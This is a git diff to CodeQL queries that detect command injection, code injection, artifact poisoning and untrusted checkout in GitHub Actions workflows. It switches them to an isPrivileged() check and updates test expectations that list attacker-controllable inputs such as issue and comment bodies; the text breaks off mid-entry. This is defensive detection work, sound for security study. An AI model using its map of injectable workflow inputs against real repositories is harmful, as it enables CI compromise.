a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index 2f9a09f59c3..bbfb226ecd1 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -16,16 +16,13 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index f71c178822c..dc28cc2569f 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -19,7 +19,16 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink -where CodeInjectionFlow::flowPath(source, sink) +where + CodeInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 62030e32263..9814df091dd 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,16 +18,13 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b71a64d52e..5d38faa94df 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,27 +14,9 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep download, Step run where - w = job.getWorkflow() and - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + job.getWorkflow().isPrivileged() and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 86b80c67215..40f6d2fec9e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -121,26 +121,9 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - from Workflow w, PRHeadCheckoutStep checkout where - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + w.isPrivileged() and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 2d96ec5a435..d5dbcbde086 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index decabad082f..99ebb1edc05 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1fad288860e..6cb2c1ed399 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -209,92 +209,5 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | 